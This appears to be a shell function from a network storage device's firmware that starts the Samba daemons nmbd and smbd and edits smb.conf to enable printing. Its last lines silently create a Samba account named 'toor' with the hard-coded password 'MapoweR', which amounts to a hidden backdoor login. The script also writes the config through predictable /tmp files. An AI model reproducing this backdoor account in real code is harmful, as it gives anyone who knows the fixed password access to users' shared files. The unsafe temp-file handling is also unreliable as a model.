service_smb_start(){
PASSWD_PROG=/usr/local/samba/sbin/smbpasswd
SMB_CONF=/etc/sysconfig/config/smb/smb.conf

/bin/cat $SMB_CONF| /bin/grep "printcap"  >/dev/null 2>&1
[ $? -eq 0 ] || {
 /bin/sed '/passdb expand/aprintcap name = /etc/lprng/printcap'  $SMB_CONF > /tmp/.smb1
 /bin/sed '/printcap name/aload printers = yes'  /tmp/.smb1  > /tmp/.smb2
 /bin/sed '/load printers/aprinting = lprng'  /tmp/.smb2 > /tmp/.smb1
 /bin/mv /tmp/.smb1 $SMB_CONF
 }
      
/usr/local/samba/sbin/nmbd
 [ $? -eq 0 ] &&\
  /bin/logger "$0 - nmbd deamon Start Succeed" ||\
  /bin/logger "$0 - nmbd deamon Start Failed"

/bin/nice -n +10 /usr/local/samba/sbin/smbd
[ $? -eq 0 ] &&\
 /bin/logger "$0 - smbd deamon Start Succeed" ||\
 /bin/logger "$0 - smbd deamon Start Failed"

admin_pass=`/bin/cat /etc/sysconfig/config/httpd.conf|/bin/awk "-F:" '{print $3}'|/bin/sed 's/\ //g'`
(echo "MapoweR";echo "MapoweR")|${PASSWD_PROG} -s -a toor >/dev/null 2>&1
(echo "${admin_pass}";echo "${admin_pass}")|${PASSWD_PROG} -s -a admin >/dev/null 2>&1

}
